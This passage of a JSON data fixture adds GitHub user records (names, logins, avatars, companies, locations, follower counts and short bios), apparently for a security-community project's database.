"2024-09-11T21:16:10.152Z", + "nest_updated_at": "2024-09-11T21:16:10.152Z", + "name": "Bilal Khan", + "login": "bilalk88", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10231632?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 31, + "created_at": "2014-12-18T10:59:36Z", + "updated_at": "2024-07-17T17:12:37Z", + "node_id": "MDQ6VXNlcjEwMjMxNjMy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 408, + "fields": { + "nest_created_at": "2024-09-11T21:16:10.962Z", + "nest_updated_at": "2024-09-11T21:16:10.962Z", + "name": "", + "login": "vevinkirk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13743689?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 17, + "created_at": "2015-08-11T06:51:30Z", + "updated_at": "2024-09-05T05:31:06Z", + "node_id": "MDQ6VXNlcjEzNzQzNjg5", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 409, + "fields": { + "nest_created_at": "2024-09-11T21:16:11.809Z", + "nest_updated_at": "2024-09-11T21:16:11.809Z", + "name": "DingjieDanielYang", + "login": "dingjiedanielyang-sec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48067965?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2019-02-27T19:11:22Z", + "updated_at": "2024-08-10T19:26:41Z", + "node_id": "MDQ6VXNlcjQ4MDY3OTY1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 410, + "fields": { + "nest_created_at": "2024-09-11T21:16:12.703Z", + "nest_updated_at": "2024-09-11T21:16:12.703Z", + "name": "Eric Kelson", + "login": "ekelson-bcove", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20729707?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2016-07-29T18:18:29Z", + "updated_at": "2024-07-12T15:52:03Z", + "node_id": "MDQ6VXNlcjIwNzI5NzA3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 411, + "fields": { + "nest_created_at": "2024-09-11T21:16:13.547Z", + "nest_updated_at": "2024-09-22T20:29:01.671Z", + "name": "Tian You", + "login": "axqd", + "email": "axqd001@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/136125?v=4", + "company": "Broadcom", + "location": "Oxford, UK", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 8, + "public_gists_count": 3, + "public_repositories_count": 1, + "created_at": "2009-10-07T05:30:48Z", + "updated_at": "2024-09-06T08:03:12Z", + "node_id": "MDQ6VXNlcjEzNjEyNQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 412, + "fields": { + "nest_created_at": "2024-09-11T21:16:26.196Z", + "nest_updated_at": "2024-09-22T20:31:08.840Z", + "name": "Vinod Anandan", + "login": "VinodAnandan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29684753?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 569, + "followers_count": 34, + "public_gists_count": 0, + "public_repositories_count": 84, + "created_at": "2017-06-25T04:45:45Z", + "updated_at": "2024-09-20T15:02:11Z", + "node_id": "MDQ6VXNlcjI5Njg0NzUz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 413, + "fields": { + "nest_created_at": "2024-09-11T21:16:51.510Z", + "nest_updated_at": "2024-09-22T17:49:09.230Z", + "name": "Jason Stitt", + "login": "countergram", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/117626?v=4", + "company": "", + "location": "USA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2009-08-20T18:44:01Z", + "updated_at": "2020-08-19T01:07:06Z", + "node_id": "MDQ6VXNlcjExNzYyNg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 414, + "fields": { + "nest_created_at": "2024-09-11T21:16:56.372Z", + "nest_updated_at": "2024-09-22T19:47:27.971Z", + "name": "Chris Cooper", + "login": "itscooper", + "email": "chris.cooper@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/7916070?v=4", + "company": "SureCloud", + "location": "UK", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 14, + "created_at": "2014-06-17T18:45:15Z", + "updated_at": "2024-09-11T10:19:58Z", + "node_id": "MDQ6VXNlcjc5MTYwNzA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 415, + "fields": { + "nest_created_at": "2024-09-11T21:17:01.669Z", + "nest_updated_at": "2024-09-22T19:45:43.801Z", + "name": "Riccardo ten Cate", + "login": "RiieCco", + "email": "r.tencate77@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8506705?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 26, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2014-08-20T19:57:52Z", + "updated_at": "2024-09-09T09:30:02Z", + "node_id": "MDQ6VXNlcjg1MDY3MDU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 416, + "fields": { + "nest_created_at": "2024-09-11T21:17:04.256Z", + "nest_updated_at": "2024-09-22T19:45:52.467Z", + "name": "DotDotSlash", + "login": "DotDotSlashRepo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4990289?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 32, + "public_gists_count": 1, + "public_repositories_count": 4, + "created_at": "2013-07-11T14:14:07Z", + "updated_at": "2023-01-04T15:07:46Z", + "node_id": "MDQ6VXNlcjQ5OTAyODk=", + "bio": "Eat Sleep Hack!", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 417, + "fields": { + "nest_created_at": "2024-09-11T21:17:05.967Z", + "nest_updated_at": "2024-09-11T21:17:05.967Z", + "name": "Chris Drake", + "login": "gitcnd", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4301826?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 19, + "public_gists_count": 3, + "public_repositories_count": 66, + "created_at": "2013-04-30T10:50:09Z", + "updated_at": "2024-03-07T03:27:10Z", + "node_id": "MDQ6VXNlcjQzMDE4MjY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 418, + "fields": { + "nest_created_at": "2024-09-11T21:17:08.078Z", + "nest_updated_at": "2024-09-11T21:17:08.078Z", + "name": "tolo7010", + "login": "tolo7010", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31411153?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 85, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-08-28T14:11:05Z", + "updated_at": "2024-06-10T04:54:04Z", + "node_id": "MDQ6VXNlcjMxNDExMTUz", + "bio": "hackerone.com/tolo7010", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 419, + "fields": { + "nest_created_at": "2024-09-11T21:17:10.184Z", + "nest_updated_at": "2024-09-11T21:17:10.184Z", + "name": "", + "login": "J3rry367", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3202678?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2013-01-07T03:20:23Z", + "updated_at": "2024-09-11T15:20:34Z", + "node_id": "MDQ6VXNlcjMyMDI2Nzg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 420, + "fields": { + "nest_created_at": "2024-09-11T21:17:10.615Z", + "nest_updated_at": "2024-09-11T21:17:10.615Z", + "name": "Rahul", + "login": "rahuldotbiz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/62949229?v=4", + "company": "", + "location": "India", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 40, + "public_gists_count": 1, + "public_repositories_count": 50, + "created_at": "2020-03-31T14:50:17Z", + "updated_at": "2024-09-05T12:15:00Z", + "node_id": "MDQ6VXNlcjYyOTQ5MjI5", + "bio": "hustler\r\n", + "is_hireable": false, + "twitter_username": "rahul_wip" + } +}, +{ + "model": "github.user", + "pk": 421, + "fields": { + "nest_created_at": "2024-09-11T21:17:13.108Z", + "nest_updated_at": "2024-09-22T19:45:37.104Z", + "name": "Victoria Drake", + "login": "victoriadrake", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24644237?v=4", + "company": "TechLeaderDocs.com", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1311, + "public_gists_count": 22, + "public_repositories_count": 88, + "created_at": "2016-12-19T04:19:59Z", + "updated_at": "2024-08-23T00:18:59Z", + "node_id": "MDQ6VXNlcjI0NjQ0MjM3", + "bio": "Engineering director and principal software engineer.", + "is_hireable": true, + "twitter_username": "victoriadotdev" + } +}, +{ + "model": "github.user", + "pk": 422, + "fields": { + "nest_created_at": "2024-09-11T21:17:28.285Z", + "nest_updated_at": "2024-09-22T19:31:03.265Z", + "name": "Martin", + "login": "martinbydefault", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25038813?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 26, + "followers_count": 22, + "public_gists_count": 2, + "public_repositories_count": 43, + "created_at": "2017-01-10T18:16:00Z", + "updated_at": "2024-08-25T21:59:53Z", + "node_id": "MDQ6VXNlcjI1MDM4ODEz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 423, + "fields": { + "nest_created_at": "2024-09-11T21:17:30.405Z", + "nest_updated_at": "2024-09-22T16:45:11.360Z", + "name": "Febna V M", + "login": "febna-vm", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/58589027?v=4", + "company": "@appfabs @Beaglesecurity", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2019-12-06T08:49:09Z", + "updated_at": "2024-09-21T18:39:53Z", + "node_id": "MDQ6VXNlcjU4NTg5MDI3", + "bio": "Cyber Security Engineer ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 424, + "fields": { + "nest_created_at": "2024-09-11T21:17:32.068Z", + "nest_updated_at": "2024-09-22T19:45:55.002Z", + "name": "Manindar Mohan", + "login": "manindar-mohan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/53038087?v=4", + "company": " Beagle Security", + "location": "Trivandrum", + "collaborators_count": 0, + "following_count": 21, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2019-07-18T08:13:29Z", + "updated_at": "2024-08-22T11:27:27Z", + "node_id": "MDQ6VXNlcjUzMDM4MDg3", + "bio": "Security Engineer at Beagle Security", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 425, + "fields": { + "nest_created_at": "2024-09-11T21:17:46.487Z", + "nest_updated_at": "2024-09-11T21:17:46.487Z", + "name": "", + "login": "phish", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1158059?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2011-10-28T14:37:51Z", + "updated_at": "2024-07-26T12:28:15Z", + "node_id": "MDQ6VXNlcjExNTgwNTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 426, + "fields": { + "nest_created_at": "2024-09-11T21:17:51.975Z", + "nest_updated_at": "2024-09-11T21:17:51.975Z", + "name": "Alex Lopez", + "login": "alexlop29", + "email": "alexander.lopez@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/34544005?v=4", + "company": "", + "location": "New York, NY", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 22, + "created_at": "2017-12-14T13:26:57Z", + "updated_at": "2024-02-06T10:24:05Z", + "node_id": "MDQ6VXNlcjM0NTQ0MDA1", + "bio": "Senior Software Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 427, + "fields": { + "nest_created_at": "2024-09-11T21:17:54.898Z", + "nest_updated_at": "2024-09-11T21:17:56.620Z", + "name": "", + "login": "pinkLagoon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/64048878?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2020-04-20T23:53:34Z", + "updated_at": "2023-04-21T01:05:50Z", + "node_id": "MDQ6VXNlcjY0MDQ4ODc4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 428, + "fields": { + "nest_created_at": "2024-09-11T21:17:58.255Z", + "nest_updated_at": "2024-09-11T21:17:58.255Z", + "name": "Jason Capriotti", + "login": "JCapriotti", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/801182?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 6, + "public_gists_count": 15, + "public_repositories_count": 67, + "created_at": "2011-05-20T20:14:35Z", + "updated_at": "2024-04-27T01:35:32Z", + "node_id": "MDQ6VXNlcjgwMTE4Mg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 429, + "fields": { + "nest_created_at": "2024-09-11T21:17:59.912Z", + "nest_updated_at": "2024-09-11T21:17:59.912Z", + "name": "", + "login": "tarasovkraud", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52695331?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-07-09T07:51:52Z", + "updated_at": "2021-07-07T14:48:44Z", + "node_id": "MDQ6VXNlcjUyNjk1MzMx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 430, + "fields": { + "nest_created_at": "2024-09-11T21:18:01.613Z", + "nest_updated_at": "2024-09-22T20:25:28.184Z", + "name": "Roel Storms", + "login": "roelstorms", + "email": "roel.storms@dfinity.org", + "avatar_url": "https://avatars.githubusercontent.com/u/1447607?v=4", + "company": "@dfinity", + "location": "Belgium", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2012-02-17T19:33:21Z", + "updated_at": "2023-10-05T11:05:17Z", + "node_id": "MDQ6VXNlcjE0NDc2MDc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 431, + "fields": { + "nest_created_at": "2024-09-11T21:18:02.902Z", + "nest_updated_at": "2024-09-22T15:48:09.582Z", + "name": "", + "login": "mmd103", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/89198478?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-08-19T11:51:18Z", + "updated_at": "2021-08-19T11:51:18Z", + "node_id": "MDQ6VXNlcjg5MTk4NDc4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 432, + "fields": { + "nest_created_at": "2024-09-11T21:18:04.527Z", + "nest_updated_at": "2024-09-11T21:18:04.527Z", + "name": "Andrej Šimko", + "login": "Hipapheralkus", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4717664?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2013-06-17T11:38:19Z", + "updated_at": "2024-07-24T11:33:42Z", + "node_id": "MDQ6VXNlcjQ3MTc2NjQ=", + "bio": "@andrejsimko1", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 433, + "fields": { + "nest_created_at": "2024-09-11T21:18:05.775Z", + "nest_updated_at": "2024-09-22T16:36:50.860Z", + "name": "Yhojann Aguilera", + "login": "yhojann-cl", + "email": "yhojann.aguilera@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2144779?v=4", + "company": "", + "location": "Chile", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 25, + "public_gists_count": 6, + "public_repositories_count": 5, + "created_at": "2012-08-13T13:53:49Z", + "updated_at": "2024-07-10T18:19:43Z", + "node_id": "MDQ6VXNlcjIxNDQ3Nzk=", + "bio": "Leader & Professional Full Stack", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 434, + "fields": { + "nest_created_at": "2024-09-11T21:18:07.475Z", + "nest_updated_at": "2024-09-22T20:25:34.665Z", + "name": "Iman", + "login": "ImanSharaf", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/78227895?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 23, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2021-01-29T17:48:30Z", + "updated_at": "2024-09-22T12:31:58Z", + "node_id": "MDQ6VXNlcjc4MjI3ODk1", + "bio": "Application Security Lead", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 435, + "fields": { + "nest_created_at": "2024-09-11T21:18:09.210Z", + "nest_updated_at": "2024-09-22T19:49:25.472Z", + "name": "", + "login": "rbsec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3534212?v=4", + "company": "CODA Security", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 375, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2013-02-11T17:02:41Z", + "updated_at": "2024-07-13T17:47:35Z", + "node_id": "MDQ6VXNlcjM1MzQyMTI=", + "bio": "Penetration tester at CODA Security.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 436, + "fields": { + "nest_created_at": "2024-09-11T21:18:10.881Z", + "nest_updated_at": "2024-09-11T21:18:10.881Z", + "name": "Julián Gómez", + "login": "JulianGR", + "email": "juliangr505@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/53094530?v=4", + "company": "", + "location": "Spain", + "collaborators_count": 0, + "following_count": 88, + "followers_count": 21, + "public_gists_count": 3, + "public_repositories_count": 17, + "created_at": "2019-07-19T17:21:10Z", + "updated_at": "2024-09-05T09:14:09Z", + "node_id": "MDQ6VXNlcjUzMDk0NTMw", + "bio": "Penetration tester", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 437, + "fields": { + "nest_created_at": "2024-09-11T21:18:12.249Z", + "nest_updated_at": "2024-09-22T19:46:06.238Z", + "name": "Amir Hossein Vafifar", + "login": "cyspad", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/114382829?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 50, + "public_gists_count": 1, + "public_repositories_count": 23, + "created_at": "2022-09-26T06:09:29Z", + "updated_at": "2023-07-03T19:39:11Z", + "node_id": "U_kgDOBtFX7Q", + "bio": "- Web Application Security Specialist\r\n- Bug Hunter\r\n- Red Teamer\r\n- Offensive Security Tools Developer\r\n- Web Application Developer", + "is_hireable": false, + "twitter_username": "cyspad" + } +}, +{ + "model": "github.user", + "pk": 438, + "fields": { + "nest_created_at": "2024-09-11T21:18:15.935Z", + "nest_updated_at": "2024-09-11T21:18:15.935Z", + "name": "", + "login": "aBUDmdBQ", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/135135848?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2023-05-31T13:37:30Z", + "updated_at": "2024-09-03T12:40:34Z", + "node_id": "U_kgDOCA4CaA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 439, + "fields": { + "nest_created_at": "2024-09-11T21:18:17.658Z", + "nest_updated_at": "2024-09-12T01:15:55.955Z", + "name": "Mojtaba1313", + "login": "mojtaba13133", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44875173?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2018-11-08T16:34:08Z", + "updated_at": "2024-02-20T10:30:29Z", + "node_id": "MDQ6VXNlcjQ0ODc1MTcz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 440, + "fields": { + "nest_created_at": "2024-09-11T21:18:19.360Z", + "nest_updated_at": "2024-09-11T21:18:19.360Z", + "name": "Cristi", + "login": "CristiVlad25", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17044663?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 265, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2016-02-03T11:22:07Z", + "updated_at": "2024-08-19T11:48:42Z", + "node_id": "MDQ6VXNlcjE3MDQ0NjYz", + "bio": "Cybersecurity and AI Enthusiast", + "is_hireable": false, + "twitter_username": "cristivlad25" + } +}, +{ + "model": "github.user", + "pk": 441, + "fields": { + "nest_created_at": "2024-09-11T21:18:20.622Z", + "nest_updated_at": "2024-09-22T20:23:23.790Z", + "name": "Michal", + "login": "mbiesiad", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/18367606?v=4", + "company": "", + "location": "Europe, Poland", + "collaborators_count": 0, + "following_count": 31, + "followers_count": 68, + "public_gists_count": 5, + "public_repositories_count": 144, + "created_at": "2016-04-09T16:11:03Z", + "updated_at": "2024-06-08T20:54:29Z", + "node_id": "MDQ6VXNlcjE4MzY3NjA2", + "bio": "Software Engineer (M.Eng, CS). OpenSource enthusiast. Security researcher", + "is_hireable": false, + "twitter_username": "michalbiesiada" + } +}, +{ + "model": "github.user", + "pk": 442, + "fields": { + "nest_created_at": "2024-09-11T21:18:22.423Z", + "nest_updated_at": "2024-09-11T21:18:22.423Z", + "name": "", + "login": "h4kc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/136261893?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2023-06-11T17:24:30Z", + "updated_at": "2024-09-05T22:20:13Z", + "node_id": "U_kgDOCB8xBQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 443, + "fields": { + "nest_created_at": "2024-09-11T21:18:25.777Z", + "nest_updated_at": "2024-09-11T21:18:26.188Z", + "name": "Colin Watson", + "login": "coj337", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9269226?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 26, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2014-10-16T14:30:02Z", + "updated_at": "2024-08-22T23:42:10Z", + "node_id": "MDQ6VXNlcjkyNjkyMjY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 444, + "fields": { + "nest_created_at": "2024-09-11T21:18:27.934Z", + "nest_updated_at": "2024-09-22T19:46:06.888Z", + "name": "Bankde Eakasit", + "login": "Bankde", + "email": "Bankde@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12493875?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 21, + "public_gists_count": 1, + "public_repositories_count": 29, + "created_at": "2015-05-18T09:28:05Z", + "updated_at": "2024-09-13T10:21:39Z", + "node_id": "MDQ6VXNlcjEyNDkzODc1", + "bio": "Dragonite != Charizard", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 445, + "fields": { + "nest_created_at": "2024-09-11T21:18:43.640Z", + "nest_updated_at": "2024-09-22T20:27:02.571Z", + "name": "Aman Gupta", + "login": "aman566", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32503192?v=4", + "company": "Stripe", + "location": "India", + "collaborators_count": 0, + "following_count": 27, + "followers_count": 27, + "public_gists_count": 0, + "public_repositories_count": 42, + "created_at": "2017-10-04T02:54:36Z", + "updated_at": "2024-07-13T04:34:39Z", + "node_id": "MDQ6VXNlcjMyNTAzMTky", + "bio": "GSoC'20 @OWASP\r\nGSoC’21 @OWASP\r\nStripe", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 446, + "fields": { + "nest_created_at": "2024-09-11T21:18:45.020Z", + "nest_updated_at": "2024-09-22T20:27:03.513Z", + "name": "Divyansh Jain", + "login": "itsdivyanshjain", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45870070?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2018-12-14T08:08:24Z", + "updated_at": "2024-09-03T04:11:51Z", + "node_id": "MDQ6VXNlcjQ1ODcwMDcw", + "bio": "", + "is_hireable": false, + "twitter_username": "itsdivyanshjain" + } +}, +{ + "model": "github.user", + "pk": 447, + "fields": { + "nest_created_at": "2024-09-11T21:18:46.260Z", + "nest_updated_at": "2024-09-11T21:18:46.260Z", + "name": "Umar Draz", + "login": "umardraz", + "email": "umar_draz@yahoo.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3677378?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2013-02-23T09:21:36Z", + "updated_at": "2024-06-25T15:32:57Z", + "node_id": "MDQ6VXNlcjM2NzczNzg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 448, + "fields": { + "nest_created_at": "2024-09-11T21:18:48.335Z", + "nest_updated_at": "2024-09-22T20:27:09.704Z", + "name": "Nils Franzen", + "login": "franzen", + "email": "github@franzens.org", + "avatar_url": "https://avatars.githubusercontent.com/u/65262?v=4", + "company": "Oortis AB", + "location": "Stockholm, Sweden", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 6, + "public_gists_count": 2, + "public_repositories_count": 7, + "created_at": "2009-03-20T14:03:32Z", + "updated_at": "2024-09-12T07:50:26Z", + "node_id": "MDQ6VXNlcjY1MjYy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 449, + "fields": { + "nest_created_at": "2024-09-11T21:18:54.545Z", + "nest_updated_at": "2024-09-18T00:22:45.844Z", + "name": "Kailash Choudhary", + "login": "kailashchoudhary11", + "email": "kailashjat604@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/75559082?v=4", + "company": "@kalvi-education", + "location": "Pune, Maharashtra", + "collaborators_count": 0, + "following_count": 75, + "followers_count": 80, + "public_gists_count": 0, + "public_repositories_count": 62, + "created_at": "2020-12-06T06:36:37Z", + "updated_at": "2024-09-16T14:33:35Z", + "node_id": "MDQ6VXNlcjc1NTU5MDgy", + "bio": "SWE || B.Tech CS '24 || \r\nDeveloper ||\r\nOpen Source Contributor\r\n", + "is_hireable": true, + "twitter_username": "CodeWithKai" + } +}, +{ + "model": "github.user", + "pk": 450, + "fields": { + "nest_created_at": "2024-09-11T21:18:54.926Z", + "nest_updated_at": "2024-09-22T20:27:02.249Z", + "name": "Sam Stepanyan", + "login": "securestep9", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20112179?v=4", + "company": "OWASP London Chapter", + "location": "London, UK", + "collaborators_count": 0, + "following_count": 76, + "followers_count": 54, + "public_gists_count": 3, + "public_repositories_count": 351, + "created_at": "2016-06-23T14:52:57Z", + "updated_at": "2024-08-27T22:58:53Z", + "node_id": "MDQ6VXNlcjIwMTEyMTc5", + "bio": "OWASP London Chapter Leader (@owasplondon) with @kerberosmansour & @alezza", + "is_hireable": false, + "twitter_username": "securestep9" + } +}, +{ + "model": "github.user", + "pk": 451, + "fields": { + "nest_created_at": "2024-09-11T21:18:56.185Z", + "nest_updated_at": "2024-09-11T21:18:56.185Z", + "name": "Zappone Federico", + "login": "ZappaBoy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45740621?v=4", + "company": "Just Another S.R.L.", + "location": "Molise, Italy", + "collaborators_count": 0, + "following_count": 43, + "followers_count": 31, + "public_gists_count": 11, + "public_repositories_count": 90, + "created_at": "2018-12-09T19:36:07Z", + "updated_at": "2024-09-11T18:10:09Z", + "node_id": "MDQ6VXNlcjQ1NzQwNjIx", + "bio": "Just Another S.R.L. Co-Founder. BB-SMILE Co-Founder. Master's Degree in Software Systems Security.", + "is_hireable": false, + "twitter_username": "" + } 